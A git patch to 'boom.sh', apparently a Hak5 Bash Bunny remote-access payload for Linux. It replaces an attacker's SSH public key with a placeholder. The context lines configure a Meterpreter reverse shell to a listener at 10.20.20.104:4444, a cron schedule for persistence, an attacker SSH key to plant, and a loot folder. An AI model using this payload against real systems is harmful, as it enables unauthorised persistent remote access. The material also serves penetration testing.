From e9a07640013dfcfcd2c10dc420a03147ef9b6b74 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Mon, 26 Aug 2024 19:46:23 -0400 Subject: [PATCH] Update boom.sh Set the RSA_KEY variable to a placeholder value, with instructions as to how the RSA public key info is found, per @hak5peaks suggestion --- payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh index a1b7fc82..82643fc0 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh @@ -3,11 +3,11 @@ # Main Payload # Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc.. +RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named REVERSESHELL=true LHOST='10.20.20.104' # Reverse Shell listening host IP LPORT='4444' # Reverse Shell listening host port CRON='30 */1 * * *' # Just the timing portion of the CRON job -RSA_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkmgAxtb8fYA7Bbk+Cs0X+gR43gYbbzdHg7AesoOF5Q95mcbiL7mu79FG4fO7Tnrtl2ARCFJZo8bphbEiSVC/zMPNqgP0trXJld2vbbpRWT8vMsysT4dgAssp9zosJdIR7y0akKByglcVPcaCub/KcQo1mtOq/HNkJ8DOmBeLNHYsL6X0HG2Zccid21DQq4dTMnKAqQrJUCPNRrE2tAx/C0E8SsVtq3cjp6T0H8AINLaHUnmAAI02PLjCZeQ6xUqnpAhgPMymwpjQ66O5EM+Vf5UlhFULn0jmlVnhxNULvYQHfRLY6YhTgVVPSxNUp+sWhyRJ1tx0nAEoJh82gwJ7J engineering@kali-2' ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces DT=$(date "+%Y.%m.%d-%H.%M.%S") DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT